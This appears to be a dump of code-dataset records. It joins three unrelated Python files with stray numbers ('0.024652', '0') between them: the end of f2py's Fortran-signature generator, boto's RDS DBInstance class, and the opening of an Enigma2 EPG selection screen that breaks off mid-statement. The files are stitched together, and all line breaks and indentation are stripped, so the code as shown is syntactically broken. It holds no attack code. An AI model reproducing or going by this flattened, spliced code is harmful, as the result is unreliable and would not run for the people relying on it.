and g['name'] not in onlyfuncs: continue ret=ret+crack2fortrangen(g,tab,as_interface=as_interface) return ret prefix='' name='' args='' blocktype=block['block'] if blocktype=='program': return '' argsl = [] if 'name' in block: name=block['name'] if 'args' in block: vars = block['vars'] for a in block['args']: a = expr2name(a, block, argsl) if not isintent_callback(vars[a]): argsl.append(a) if block['block']=='function' or argsl: args='(%s)'%','.join(argsl) f2pyenhancements = '' if 'f2pyenhancements' in block: for k in block['f2pyenhancements'].keys(): f2pyenhancements = '%s%s%s %s'%(f2pyenhancements,tab+tabchar,k,block['f2pyenhancements'][k]) intent_lst = block.get('intent',[])[:] if blocktype=='function' and 'callback' in intent_lst: intent_lst.remove('callback') if intent_lst: f2pyenhancements = '%s%sintent(%s) %s'%\ (f2pyenhancements,tab+tabchar, ','.join(intent_lst),name) use='' if 'use' in block: use=use2fortran(block['use'],tab+tabchar) common='' if 'common' in block: common=common2fortran(block['common'],tab+tabchar) if name=='unknown_interface': name='' result='' if 'result' in block: result=' result (%s)'%block['result'] if block['result'] not in argsl: argsl.append(block['result']) #if 'prefix' in block: # prefix=block['prefix']+' ' body=crack2fortrangen(block['body'],tab+tabchar) vars=vars2fortran(block,block['vars'],argsl,tab+tabchar, as_interface=as_interface) mess='' if 'from' in block and not as_interface: mess='! in %s'%block['from'] if 'entry' in block: entry_stmts = '' for k,i in block['entry'].items(): entry_stmts = '%s%sentry %s(%s)' \ % (entry_stmts,tab+tabchar,k,','.join(i)) body = body + entry_stmts if blocktype=='block data' and name=='_BLOCK_DATA_': name = '' ret='%s%s%s %s%s%s %s%s%s%s%s%s%send %s %s'%(tab,prefix,blocktype,name,args,result,mess,f2pyenhancements,use,vars,common,body,tab,blocktype,name) return ret def common2fortran(common,tab=''): ret='' for k in common.keys(): if k=='_BLNK_': ret='%s%scommon %s'%(ret,tab,','.join(common[k])) else: ret='%s%scommon /%s/ %s'%(ret,tab,k,','.join(common[k])) return ret def use2fortran(use,tab=''): ret='' for m in use.keys(): ret='%s%suse %s,'%(ret,tab,m) if use[m]=={}: if ret and ret[-1]==',': ret=ret[:-1] continue if 'only' in use[m] and use[m]['only']: ret='%s only:'%(ret) if 'map' in use[m] and use[m]['map']: c=' ' for k in use[m]['map'].keys(): if k==use[m]['map'][k]: ret='%s%s%s'%(ret,c,k); c=',' else: ret='%s%s%s=>%s'%(ret,c,k,use[m]['map'][k]); c=',' if ret and ret[-1]==',': ret=ret[:-1] return ret def true_intent_list(var): lst = var['intent'] ret = [] for intent in lst: try: exec('c = isintent_%s(var)' % intent) except NameError: c = 0 if c: ret.append(intent) return ret def vars2fortran(block,vars,args,tab='', as_interface=False): """ TODO: public sub ... """ setmesstext(block) ret='' nout=[] for a in args: if a in block['vars']: nout.append(a) if 'commonvars' in block: for a in block['commonvars']: if a in vars: if a not in nout: nout.append(a) else: errmess('vars2fortran: Confused?!: "%s" is not defined in vars.\n'%a) if 'varnames' in block: nout.extend(block['varnames']) if not as_interface: for a in vars.keys(): if a not in nout: nout.append(a) for a in nout: if 'depend' in vars[a]: for d in vars[a]['depend']: if d in vars and 'depend' in vars[d] and a in vars[d]['depend']: errmess('vars2fortran: Warning: cross-dependence between variables "%s" and "%s"\n'%(a,d)) if 'externals' in block and a in block['externals']: if isintent_callback(vars[a]): ret='%s%sintent(callback) %s'%(ret,tab,a) ret='%s%sexternal %s'%(ret,tab,a) if isoptional(vars[a]): ret='%s%soptional %s'%(ret,tab,a) if a in vars and 'typespec' not in vars[a]: continue cont=1 for b in block['body']: if a==b['name'] and b['block']=='function': cont=0;break if cont: continue if a not in vars: show(vars) outmess('vars2fortran: No definition for argument "%s".\n'%a) continue if a==block['name'] and not block['block']=='function': continue if 'typespec' not in vars[a]: if 'attrspec' in vars[a] and 'external' in vars[a]['attrspec']: if a in args: ret='%s%sexternal %s'%(ret,tab,a) continue show(vars[a]) outmess('vars2fortran: No typespec for argument "%s".\n'%a) continue vardef=vars[a]['typespec'] if vardef=='type' and 'typename' in vars[a]: vardef='%s(%s)'%(vardef,vars[a]['typename']) selector={} if 'kindselector' in vars[a]: selector=vars[a]['kindselector'] elif 'charselector' in vars[a]: selector=vars[a]['charselector'] if '*' in selector: if selector['*'] in ['*',':']: vardef='%s*(%s)'%(vardef,selector['*']) else: vardef='%s*%s'%(vardef,selector['*']) else: if 'len' in selector: vardef='%s(len=%s'%(vardef,selector['len']) if 'kind' in selector: vardef='%s,kind=%s)'%(vardef,selector['kind']) else: vardef='%s)'%(vardef) elif 'kind' in selector: vardef='%s(kind=%s)'%(vardef,selector['kind']) c=' ' if 'attrspec' in vars[a]: attr=[] for l in vars[a]['attrspec']: if l not in ['external']: attr.append(l) if attr: vardef='%s, %s'%(vardef,','.join(attr)) c=',' if 'dimension' in vars[a]: # if not isintent_c(vars[a]): # vars[a]['dimension'].reverse() vardef='%s%sdimension(%s)'%(vardef,c,','.join(vars[a]['dimension'])) c=',' if 'intent' in vars[a]: lst = true_intent_list(vars[a]) if lst: vardef='%s%sintent(%s)'%(vardef,c,','.join(lst)) c=',' if 'check' in vars[a]: vardef='%s%scheck(%s)'%(vardef,c,','.join(vars[a]['check'])) c=',' if 'depend' in vars[a]: vardef='%s%sdepend(%s)'%(vardef,c,','.join(vars[a]['depend'])) c=',' if '=' in vars[a]: v = vars[a]['='] if vars[a]['typespec'] in ['complex','double complex']: try: v = eval(v) v = '(%s,%s)' % (v.real,v.imag) except: pass vardef='%s :: %s=%s'%(vardef,a,v) else: vardef='%s :: %s'%(vardef,a) ret='%s%s%s'%(ret,tab,vardef) return ret ###### def crackfortran(files): global usermodules outmess('Reading fortran codes...\n',0) readfortrancode(files,crackline) outmess('Post-processing...\n',0) usermodules=[] postlist=postcrack(grouplist[0]) outmess('Post-processing (stage 2)...\n',0) postlist=postcrack2(postlist) return usermodules+postlist def crack2fortran(block): global f2py_version pyf=crack2fortrangen(block)+'\n' header="""! -*- f90 -*- ! Note: the context of this file is case sensitive. """ footer=""" ! This file was auto-generated with f2py (version:%s). ! See http://cens.ioc.ee/projects/f2py2e/ """%(f2py_version) return header+pyf+footer if __name__ == "__main__": files=[] funcs=[] f=1;f2=0;f3=0 showblocklist=0 for l in sys.argv[1:]: if l=='': pass elif l[0]==':': f=0 elif l=='-quiet': quiet=1 verbose=0 elif l=='-verbose': verbose=2 quiet=0 elif l=='-fix': if strictf77: outmess('Use option -f90 before -fix if Fortran 90 code is in fix form.\n',0) skipemptyends=1 sourcecodeform='fix' elif l=='-skipemptyends': skipemptyends=1 elif l=='--ignore-contains': ignorecontains=1 elif l=='-f77': strictf77=1 sourcecodeform='fix' elif l=='-f90': strictf77=0 sourcecodeform='free' skipemptyends=1 elif l=='-h': f2=1 elif l=='-show': showblocklist=1 elif l=='-m': f3=1 elif l[0]=='-': errmess('Unknown option %s\n'%`l`) elif f2: f2=0 pyffilename=l elif f3: f3=0 f77modulename=l elif f: try: open(l).close() files.append(l) except IOError,detail: errmess('IOError: %s\n'%str(detail)) else: funcs.append(l) if not strictf77 and f77modulename and not skipemptyends: outmess("""\ Warning: You have specifyied module name for non Fortran 77 code that should not need one (expect if you are scanning F90 code for non module blocks but then you should use flag -skipemptyends and also be sure that the files do not contain programs without program statement). """,0) postlist=crackfortran(files,funcs) if pyffilename: outmess('Writing fortran code to file %s\n'%`pyffilename`,0) pyf=crack2fortran(postlist) f=open(pyffilename,'w') f.write(pyf) f.close() if showblocklist: show(postlist)
0.024652
# Copyright (c) 2006-2009 Mitch Garnaat http://garnaat.org/ # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. from boto.rds.dbsecuritygroup import DBSecurityGroup from boto.rds.parametergroup import ParameterGroup from boto.resultset import ResultSet class DBInstance(object): """ Represents a RDS DBInstance Properties reference available from the AWS documentation at http://goo.gl/sC2Kn :ivar connection: connection :ivar id: The name and identifier of the DBInstance :ivar create_time: The date and time of creation :ivar engine: The database engine being used :ivar status: The status of the database in a string. e.g. "available" :ivar allocated_storage: The size of the disk in gigabytes (int). :ivar endpoint: A tuple that describes the hostname and port of the instance. This is only available when the database is in status "available". :ivar instance_class: Contains the name of the compute and memory capacity class of the DB Instance. :ivar master_username: The username that is set as master username at creation time. :ivar parameter_groups: Provides the list of DB Parameter Groups applied to this DB Instance. :ivar security_groups: Provides List of DB Security Group elements containing only DBSecurityGroup.Name and DBSecurityGroup.Status subelements. :ivar availability_zone: Specifies the name of the Availability Zone the DB Instance is located in. :ivar backup_retention_period: Specifies the number of days for which automatic DB Snapshots are retained. :ivar preferred_backup_window: Specifies the daily time range during which automated backups are created if automated backups are enabled, as determined by the backup_retention_period. :ivar preferred_maintenance_window: Specifies the weekly time range (in UTC) during which system maintenance can occur. (string) :ivar latest_restorable_time: Specifies the latest time to which a database can be restored with point-in-time restore. (string) :ivar multi_az: Boolean that specifies if the DB Instance is a Multi-AZ deployment. :ivar iops: The current number of provisioned IOPS for the DB Instance. Can be None if this is a standard instance. :ivar pending_modified_values: Specifies that changes to the DB Instance are pending. This element is only included when changes are pending. Specific changes are identified by subelements. :ivar read_replica_dbinstance_identifiers: List of read replicas associated with this DB instance. """ def __init__(self, connection=None, id=None): self.connection = connection self.id = id self.create_time = None self.engine = None self.status = None self.allocated_storage = None self.endpoint = None self.instance_class = None self.master_username = None self.parameter_groups = [] self.security_groups = [] self.read_replica_dbinstance_identifiers = [] self.availability_zone = None self.backup_retention_period = None self.preferred_backup_window = None self.preferred_maintenance_window = None self.latest_restorable_time = None self.multi_az = False self.iops = None self.pending_modified_values = None self._in_endpoint = False self._port = None self._address = None def __repr__(self): return 'DBInstance:%s' % self.id def startElement(self, name, attrs, connection): if name == 'Endpoint': self._in_endpoint = True elif name == 'DBParameterGroups': self.parameter_groups = ResultSet([('DBParameterGroup', ParameterGroup)]) return self.parameter_groups elif name == 'DBSecurityGroups': self.security_groups = ResultSet([('DBSecurityGroup', DBSecurityGroup)]) return self.security_groups elif name == 'PendingModifiedValues': self.pending_modified_values = PendingModifiedValues() return self.pending_modified_values elif name == 'ReadReplicaDBInstanceIdentifiers': self.read_replica_dbinstance_identifiers = \ ReadReplicaDBInstanceIdentifiers() return self.read_replica_dbinstance_identifiers return None def endElement(self, name, value, connection): if name == 'DBInstanceIdentifier': self.id = value elif name == 'DBInstanceStatus': self.status = value elif name == 'InstanceCreateTime': self.create_time = value elif name == 'Engine': self.engine = value elif name == 'DBInstanceStatus': self.status = value elif name == 'AllocatedStorage': self.allocated_storage = int(value) elif name == 'DBInstanceClass': self.instance_class = value elif name == 'MasterUsername': self.master_username = value elif name == 'Port': if self._in_endpoint: self._port = int(value) elif name == 'Address': if self._in_endpoint: self._address = value elif name == 'Endpoint': self.endpoint = (self._address, self._port) self._in_endpoint = False elif name == 'AvailabilityZone': self.availability_zone = value elif name == 'BackupRetentionPeriod': self.backup_retention_period = value elif name == 'LatestRestorableTime': self.latest_restorable_time = value elif name == 'PreferredMaintenanceWindow': self.preferred_maintenance_window = value elif name == 'PreferredBackupWindow': self.preferred_backup_window = value elif name == 'MultiAZ': if value.lower() == 'true': self.multi_az = True elif name == 'Iops': self.iops = int(value) else: setattr(self, name, value) @property def security_group(self): """ Provide backward compatibility for previous security_group attribute. """ if len(self.security_groups) > 0: return self.security_groups[-1] else: return None @property def parameter_group(self): """ Provide backward compatibility for previous parameter_group attribute. """ if len(self.parameter_groups) > 0: return self.parameter_groups[-1] else: return None def snapshot(self, snapshot_id): """ Create a new DB snapshot of this DBInstance. :type identifier: string :param identifier: The identifier for the DBSnapshot :rtype: :class:`boto.rds.dbsnapshot.DBSnapshot` :return: The newly created DBSnapshot """ return self.connection.create_dbsnapshot(snapshot_id, self.id) def reboot(self): """ Reboot this DBInstance :rtype: :class:`boto.rds.dbsnapshot.DBSnapshot` :return: The newly created DBSnapshot """ return self.connection.reboot_dbinstance(self.id) def update(self, validate=False): """ Update the DB instance's status information by making a call to fetch the current instance attributes from the service. :type validate: bool :param validate: By default, if EC2 returns no data about the instance the update method returns quietly. If the validate param is True, however, it will raise a ValueError exception if no data is returned from EC2. """ rs = self.connection.get_all_dbinstances(self.id) if len(rs) > 0: for i in rs: if i.id == self.id: self.__dict__.update(i.__dict__) elif validate: raise ValueError('%s is not a valid Instance ID' % self.id) return self.status def stop(self, skip_final_snapshot=False, final_snapshot_id=''): """ Delete this DBInstance. :type skip_final_snapshot: bool :param skip_final_snapshot: This parameter determines whether a final db snapshot is created before the instance is deleted. If True, no snapshot is created. If False, a snapshot is created before deleting the instance. :type final_snapshot_id: str :param final_snapshot_id: If a final snapshot is requested, this is the identifier used for that snapshot. :rtype: :class:`boto.rds.dbinstance.DBInstance` :return: The deleted db instance. """ return self.connection.delete_dbinstance(self.id, skip_final_snapshot, final_snapshot_id) def modify(self, param_group=None, security_groups=None, preferred_maintenance_window=None, master_password=None, allocated_storage=None, instance_class=None, backup_retention_period=None, preferred_backup_window=None, multi_az=False, iops=None, apply_immediately=False): """ Modify this DBInstance. :type param_group: str :param param_group: Name of DBParameterGroup to associate with this DBInstance. :type security_groups: list of str or list of DBSecurityGroup objects :param security_groups: List of names of DBSecurityGroup to authorize on this DBInstance. :type preferred_maintenance_window: str :param preferred_maintenance_window: The weekly time range (in UTC) during which maintenance can occur. Default is Sun:05:00-Sun:09:00 :type master_password: str :param master_password: Password of master user for the DBInstance. Must be 4-15 alphanumeric characters. :type allocated_storage: int :param allocated_storage: The new allocated storage size, in GBs. Valid values are [5-1024] :type instance_class: str :param instance_class: The compute and memory capacity of the DBInstance. Changes will be applied at next maintenance window unless apply_immediately is True. Valid values are: * db.m1.small * db.m1.large * db.m1.xlarge * db.m2.xlarge * db.m2.2xlarge * db.m2.4xlarge :type apply_immediately: bool :param apply_immediately: If true, the modifications will be applied as soon as possible rather than waiting for the next preferred maintenance window. :type backup_retention_period: int :param backup_retention_period: The number of days for which automated backups are retained. Setting this to zero disables automated backups. :type preferred_backup_window: str :param preferred_backup_window: The daily time range during which automated backups are created (if enabled). Must be in h24:mi-hh24:mi format (UTC). :type multi_az: bool :param multi_az: If True, specifies the DB Instance will be deployed in multiple availability zones. :type iops: int :param iops: The amount of IOPS (input/output operations per second) to Provisioned for the DB Instance. Can be modified at a later date. Must scale linearly. For every 1000 IOPS provision, you must allocated 100 GB of storage space. This scales up to 1 TB / 10 000 IOPS for MySQL and Oracle. MSSQL is limited to 700 GB / 7 000 IOPS. If you specify a value, it must be at least 1000 IOPS and you must allocate 100 GB of storage. :rtype: :class:`boto.rds.dbinstance.DBInstance` :return: The modified db instance. """ return self.connection.modify_dbinstance(self.id, param_group, security_groups, preferred_maintenance_window, master_password, allocated_storage, instance_class, backup_retention_period, preferred_backup_window, multi_az, apply_immediately, iops) class PendingModifiedValues(dict): def startElement(self, name, attrs, connection): return None def endElement(self, name, value, connection): if name != 'PendingModifiedValues': self[name] = value class ReadReplicaDBInstanceIdentifiers(list): def startElement(self, name, attrs, connection): return None def endElement(self, name, value, connection): if name == 'ReadReplicaDBInstanceIdentifier': self.append(value)
0
from __future__ import absolute_import from time import localtime, time, strftime, mktime from enigma import eServiceReference, eTimer, eServiceCenter, ePoint from Screens.Screen import Screen from Screens.HelpMenu import HelpableScreen from Components.About import about from Components.ActionMap import HelpableActionMap, HelpableNumberActionMap from Components.Button import Button from Components.config import config, configfile, ConfigClock from Components.EpgList import EPGList, EPGBouquetList, TimelineText, EPG_TYPE_SINGLE, EPG_TYPE_SIMILAR, EPG_TYPE_MULTI, EPG_TYPE_ENHANCED, EPG_TYPE_INFOBAR, EPG_TYPE_INFOBARGRAPH, EPG_TYPE_GRAPH, EPG_TYPE_VERTICAL, MAX_TIMELINES from Components.MenuList import MenuList from Components.Label import Label from Components.Pixmap import Pixmap from Components.Sources.ServiceEvent import ServiceEvent from Components.Sources.Event import Event from Components.UsageConfig import preferredTimerPath from Screens.TimerEdit import TimerSanityConflict from Screens.EventView import EventViewEPGSelect, EventViewSimple from Screens.ChoiceBox import ChoiceBox from Screens.MessageBox import MessageBox from Screens.PictureInPicture import PictureInPicture from Screens.Setup import Setup from Screens.TimeDateInput import TimeDateInput from RecordTimer import RecordTimerEntry, parseEvent, AFTEREVENT from Screens.TimerEntry import TimerEntry, InstantRecordTimerEntry from ServiceReference import ServiceReference from Tools.HardwareInfo import HardwareInfo from RecordTimer import TIMERTYPE from skin import getSkinFactor mepg_config_initialized = False # PiPServiceRelation installed? try: from Plugins.SystemPlugins.PiPServiceRelation.plugin import getRelationDict plugin_PiPServiceRelation_installed = True except: plugin_PiPServiceRelation_installed = False class EPGSelection(Screen, HelpableScreen): EMPTY = 0 ADD_TIMER = 1 REMOVE_TIMER = 2 ZAP = 1 def __init__(self, session, service = None, zapFunc = None, eventid = None, bouquetChangeCB=None, serviceChangeCB = None, EPGtype = None, StartBouquet = None, StartRef = None, bouquets = None): Screen.__init__(self, session) self.setTitle(_('EPG Selection')) HelpableScreen.__init__(self) self.zapFunc = zapFunc self.serviceChangeCB = serviceChangeCB self.bouquets = bouquets graphic = False if EPGtype == 'single': self.type = EPG_TYPE_SINGLE elif EPGtype == 'infobar': self.type = EPG_TYPE_INFOBAR elif EPGtype == 'enhanced': self.type = EPG_TYPE_ENHANCED elif EPGtype == 'graph': self.type = EPG_TYPE_GRAPH if config.epgselection.graph_type_mode.value == "graphics": graphic = True elif EPGtype == 'infobargraph': self.type = EPG_TYPE_INFOBARGRAPH if config.epgselection.infobar_type_mode.value == "graphics": graphic = True elif EPGtype == 'multi': self.type = EPG_TYPE_MULTI elif EPGtype == 'vertical': self.type = EPG_TYPE_VERTICAL elif EPGtype is None and eventid == None and isinstance(service, eServiceReference): self.type = EPG_TYPE_SINGLE else: self.type = EPG_TYPE_SIMILAR if not self.type == EPG_TYPE_SINGLE: self.StartBouquet = StartBouquet self.StartRef = StartRef self.servicelist = None self.ChoiceBoxDialog = None self.ask_time = -1 self.closeRecursive = False self.eventviewDialog = None self.eventviewWasShown = False self.currch = None self.Oldpipshown = False if self.session.pipshown: self.Oldpipshown = True self.session.pipshown = False self.cureventindex = None if plugin_PiPServiceRelation_installed: self.pipServiceRelation = getRelationDict() else: self.pipServiceRelation = {} self.zapnumberstarted = False self.NumberZapTimer = eTimer() self.NumberZapTimer.callback.append(self.dozumberzap) self.NumberZapField = None self.CurrBouquet = None self.CurrService = None self['Service'] = ServiceEvent() self['Event'] = Event() self['lab1'] = Label(_('Please wait while gathering data...')) self.key_green_choice = self.EMPTY #//vertical if self.type == EPG_TYPE_VERTICAL: self.StartBouquet = StartBouquet self.StartRef = StartRef self.servicelist = service self.bouquetlist_active = False self.firststart = True self.lastEventTime = (time(), time()+3600) self.lastMinus = 0 self.activeList = 1 self.myServices = [] self.list = [] else: self.activeList = '' self["number"] = Label() self["number"].hide() #// if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH or self.type == EPG_TYPE_VERTICAL: self.RefreshColouredKeys() else: self['key_red'] = Button(_('IMDb Search')) self['key_green'] = Button(_('Add Timer')) self['key_yellow'] = Button(_('EPG Search')) self['key_blue'] = Button(_('Add AutoTimer')) self['dialogactions'] = HelpableActionMap(self, 'WizardActions', { 'back': (self.closeChoiceBoxDialog, _('Close dialog')), }, -1) self['dialogactions'].csel = self self["dialogactions"].setEnabled(False) self['okactions'] = HelpableActionMap(self, 'OkCancelActions', { 'cancel': (self.closeScreen, _('Exit EPG')), 'OK': (self.OK, _('Zap to channel (setup in menu)')), 'OKLong': (self.OKLong, _('Zap to channel and close (setup in menu)')) }, -1) self['okactions'].csel = self self['colouractions'] = HelpableActionMap(self, 'ColorActions', { 'red': (self.redButtonPressed, _('IMDB search for current event')), 'redlong': (self.redButtonPressedLong, _('Sort EPG List')), 'green': (self.greenButtonPressed, _('Add/Remove timer for current event')), 'greenlong': (self.greenButtonPressedLong, _('Show Timer List')), 'yellow': (self.yellowButtonPressed, _('Search for similar events')), 'blue': (self.blueButtonPressed, _('Add a auto timer for current event')), 'bluelong': (self.blueButtonPressedLong, _('Show AutoTimer List')) }, -1) self['colouractions'].csel = self self['recordingactions'] = HelpableActionMap(self, 'InfobarInstantRecord', { 'ShortRecord': (self.recButtonPressed, _('Add a record timer for current event')), 'LongRecord': (self.recButtonPressedLong, _('Add a zap timer for current event')) }, -1) self['recordingactions'].csel = self if self.type == EPG_TYPE_SIMILAR: self.currentService = service self.eventid = eventid self['epgactions'] = HelpableActionMap(self, 'EPGSelectActions', { 'info': (self.Info, _('Show detailed event info')), 'infolong': (self.InfoLong, _('Show single epg for current channel')), 'menu': (self.createSetup, _('Setup menu')) }, -1) self['epgactions'].csel = self elif self.type == EPG_TYPE_SINGLE: self.currentService = ServiceReference(service) self['epgactions'] = HelpableActionMap(self, 'EPGSelectActions', { 'nextService': (self.nextService, _('Goto next channel')), 'prevService': (self.prevService, _('Goto previous channel')), 'info': (self.Info, _('Show detailed event info')), 'epg': (self.Info, _('Show detailed event info')), 'menu': (self.createSetup, _('Setup menu')) }, -1) self['epgactions'].csel = self self['epgcursoractions'] = HelpableActionMap(self, 'DirectionActions', { 'left': (self.prevPage, _('Move up a page')), 'right': (self.nextPage, _('Move down a page')), 'up': (self.moveUp, _('Goto previous channel')), 'down': (self.moveDown, _('Goto next channel')) }, -1) self['epgcursoractions'].csel = self elif self.type == EPG_TYPE_INFOBAR or self.type == EPG_TYPE_ENHANCED: if self.type == EPG_TYPE_INFOBAR: self.skinName = 'QuickEPG' self['epgactions'] = HelpableActionMap(self, 'EPGSelectActions', { 'nextBouquet': (self.nextBouquet, _('Goto next bouquet')), 'prevBouquet': (self.prevBouquet, _('Goto previous bouquet')), 'nextService': (self.nextPage, _('Move down a page')), 'prevService': (self.prevPage, _('Move up a page')), 'input_date_time': (self.enterDateTime, _('Goto specific data/time')), 'epg': (self.epgButtonPressed, _('Show single epg for current channel')), 'info': (self.Info, _('Show detailed event info')), 'infolong': (self.InfoLong, _('Show single epg for current channel')), 'menu': (self.createSetup, _('Setup menu')) }, -1) self['epgactions'].csel = self self['epgcursoractions'] = HelpableActionMap(self, 'DirectionActions', { 'left': (self.prevService, _('Goto previous channel')), 'right': (self.nextService, _('Goto next channel')), 'up': (self.moveUp, _('Goto previous channel')), 'down': (self.moveDown, _('Goto next channel')) }, -1) self['epgcursoractions'].csel = self elif self.type == EPG_TYPE_ENHANCED: self['epgactions'] = HelpableActionMap(self, 'EPGSelectActions', { 'nextBouquet': (self.nextBouquet, _('Goto next bouquet')), 'prevBouquet': (self.prevBouquet, _('Goto previous bouquet')), 'nextService': (self.nextService, _('Goto next channel')), 'prevService': (self.prevService, _('Goto previous channel')), 'input_date_time': (self.enterDateTime, _('Goto specific data/time')), 'info': (self.Info, _('Show detailed event info')), 'infolong': (self.InfoLong, _('Show single epg for current channel')), 'epg': (self.Info, _('Show detailed event info')), 'menu': (self.createSetup, _('Setup menu')) }, -1) self['epgactions'].csel = self self['epgcursoractions'] = HelpableActionMap(self, 'DirectionActions', { 'left': (self.prevPage, _('Move up a page')), 'right': (self.nextPage, _('Move down a page')), 'up': (self.moveUp, _('Goto previous channel')), 'down': (self.moveDown, _('Goto next channel')) }, -1) self['epgcursoractions'].csel = self self['input_actions'] = HelpableNumberActionMap(self, 'NumberActions', { '0': (self.keyNumberGlobal, _('enter number to jump to channel.')), '1': (self.keyNumberGlobal, _('enter number to jump to channel.')), '2': (self.keyNumberGlobal, _('enter number to jump to channel.')), '3': (self.keyNumberGlobal, _('enter number to jump to channel.')), '4': (self.keyNumberGlobal, _('enter number to jump to channel.')), '5': (self.keyNumberGlobal, _('enter number to jump to channel.')), '6': (self.keyNumberGlobal, _('enter number to jump to channel.')), '7': (self.keyNumberGlobal, _('enter number to jump to channel.')), '8': (self.keyNumberGlobal, _('enter number to jump to channel.')), '9': (self.keyNumberGlobal, _('enter number to jump to channel.')) }, -1) self['input_actions'].csel = self self.list = [] self.servicelist = service self.currentService = self.session.nav.getCurrentlyPlayingServiceOrGroup() elif self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: if self.type == EPG_TYPE_GRAPH: if not config.epgselection.graph_pig.value: self.skinName = 'GraphicalEPG' else: self.skinName = 'GraphicalEPGPIG' now = time() - int(config.epgselection.graph_histminutes.value) * 60 self.ask_time = now - now % (int(config.epgselection.graph_roundto.value) * 60) if 'primetime' in config.epgselection.graph_startmode.value: basetime = localtime(self.ask_time) basetime = (basetime[0], basetime[1], basetime[2], int(config.epgselection.graph_primetimehour.value), int(config.epgselection.graph_primetimemins.value), 0, basetime[6], basetime[7], basetime[8]) self.ask_time = mktime(basetime) if self.ask_time + 3600 < time(): self.ask_time += 86400 elif self.type == EPG_TYPE_INFOBARGRAPH: self.skinName = 'GraphicalInfoBarEPG' now = time() - int(config.epgselection.infobar_histminutes.value) * 60 self.ask_time = now - now % (int(config.epgselection.infobar_roundto.value) * 60) self.closeRecursive = False self.bouquetlist_active = False self['bouquetlist'] = EPGBouquetList(graphic=graphic) self['bouquetlist'].hide() self['timeline_text'] = TimelineText(type=self.type, graphic=graphic) self['Event'] = Event() self['primetime'] = Label(_('PRIMETIME')) self['change_bouquet'] = Label(_('CHANGE BOUQUET')) self['jump'] = Label(_('JUMP 24 HOURS')) self['page'] = Label(_('PAGE UP/DOWN')) self.time_lines = [] for x in range(0, MAX_TIMELINES): pm = Pixmap() self.time_lines.append(pm) self['timeline%d' % x] = pm self['timeline_now'] = Pixmap() self.updateTimelineTimer = eTimer() self.updateTimelineTimer.callback.append(self.moveTimeLines) self.updateTimelineTimer.start(60000) self['bouquetokactions'] = HelpableActionMap(self, 'OkCancelActions', { 'cancel': (self.BouquetlistHide, _('Close bouquet list.')), 'OK': (self.BouquetOK, _('Change to bouquet')), }, -1) self['bouquetokactions'].csel = self self["bouquetokactions"].setEnabled(False) self['bouquetcursoractions'] = HelpableActionMap(self, 'DirectionActions', { 'left': (self.moveBouquetPageUp, _('Goto previous event')), 'right': (self.moveBouquetPageDown, _('Goto next event')), 'up': (self.moveBouquetUp, _('Goto previous channel')), 'down': (self.moveBouquetDown, _('Goto next channel')) }, -1) self['bouquetcursoractions'].csel = self self["bouquetcursoractions"].setEnabled(False) self['epgcursoractions'] = HelpableActionMap(self, 'DirectionActions', { 'left': (self.leftPressed, _('Goto previous event')), 'right': (self.rightPressed, _('Goto next event')), 'up': (self.moveUp, _('Goto previous channel')), 'down': (self.moveDown, _('Goto next channel')) }, -1) self['epgcursoractions'].csel = self if config.epgselection.graph_channelbtn.value == 'bouquet': self['epgactions'] = HelpableActionMap(self, 'EPGSelectActions', { 'nextService': (self.nextBouquet, _('Goto next bouquet')), 'prevService': (self.prevBouquet, _('Goto previous bouquet')), 'nextBouquet': (self.nextBouquet, _('Goto next bouquet')), 'prevBouquet': (self.prevBouquet, _('Goto previous bouquet')), 'input_date_time': (self.enterDateTime, _('Goto specific data/time')), 'epg': (self.epgButtonPressed, _('Show single epg for current channel')), 'info': (self.Info, _('Show detailed event info')), 'infolong': (self.InfoLong, _('Show single epg for current channel')), 'tv': (self.Bouquetlist, _('Toggle between bouquet/epg lists')), 'tvlong': (self.togglePIG, _('Toggle Picture In Graphics')), 'menu': (self.createSetup, _('Setup menu')) }, -1) elif config.epgselection.graph_channelbtn.value == 'page': self['epgactions'] = HelpableActionMap(self, 'EPGSelectActions', { 'nextService': (self.nextPage, _('Page down')), 'prevService': (self.prevPage, _('Page up')), 'nextBouquet': (self.nextBouquet, _('Goto next bouquet')), 'prevBouquet': (self.prevBouquet, _('Goto previous bouquet')), 'input_date_time': (self.enterDateTime, _('Goto specific data/time')), 'epg': (self.epgButtonPressed, _('Show single epg for current channel')), 'info': (self.Info, _('Show detailed event info')), 'infolong': (self.InfoLong, _('Show single epg for current channel')), 'tv': (self.Bouquetlist, _('Toggle between bouquet/epg lists')), 'tvlong': (self.togglePIG, _('Toggle Picture In Graphics')), 'menu': (self.createSetup, _('Setup menu')) }, -1) else: self['epgactions'] = HelpableActionMap(self, 'EPGSelectActions', { 'nextService': (self.nextService, _('Jump forward 24 hours')), 'prevService': (self.prevService, _('Jump back 24 hours')), 'nextBouquet': (self.nextBouquet, _('Goto next bouquet')), 'prevBouquet': (self.prevBouquet, _('Goto previous bouquet')), 'input_date_time': (self.enterDateTime, _('Goto specific data/time')), 'epg': (self.epgButtonPressed, _('Show single epg for current channel')), 'info': (self.Info, _('Show detailed event info')), 'infolong': (self.InfoLong, _('Show single epg for current channel')), 'tv': (self.Bouquetlist, _('Toggle between bouquet/epg lists')), 'tvlong': (self.togglePIG, _('Toggle Picture In Graphics')), 'menu': (self.createSetup, _('Setup menu')) }, -1) self['epgactions'].csel = self self['input_actions'] = HelpableNumberActionMap(self, 'NumberActions', { '1': (self.keyNumberGlobal, _('Reduce time scale')), '2': (self.keyNumberGlobal, _('Page up')), '3': (self.keyNumberGlobal, _('Increase time scale')), '4': 